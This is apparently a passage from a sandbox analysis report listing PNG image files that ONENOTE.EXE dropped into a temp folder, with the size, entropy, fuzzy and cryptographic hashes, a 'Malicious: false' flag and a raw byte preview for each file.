Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{BA4E9CB2-0508-44DD-A393-F61FCBACA9BB}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{BB65D474-089E-4970-8F25-07265948BD33}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{BE05A531-18EB-4F27-9E1F-16021CFA5962}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{BEE19542-CBE3-44E4-9593-B04FB737C808}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{BEF37374-114D-4FA2-B485-D2AC5D98B41A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{C11C768D-A1DA-4AFD-9AA9-C9785119250E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{C14617AB-5434-4415-8D9D-F06CE6BF1519}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{C43A8CFF-A746-4A5C-90C8-BF1416EA93EC}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{C6D17E67-3827-417F-9F82-C95B34F35674}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{CDB44C2F-29B6-45CE-AEA7-BD727049B4DA}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{CFDD510F-AC77-4844-8510-26667C0F1B31}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{D146D55A-6D61-4911-B431-7321B8CF4651}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{D670BAF0-F2C1-4EBB-85FE-E6F20831F14D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{D6A5E0C5-0A6E-4492-8401-79D69C6C1ABD}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
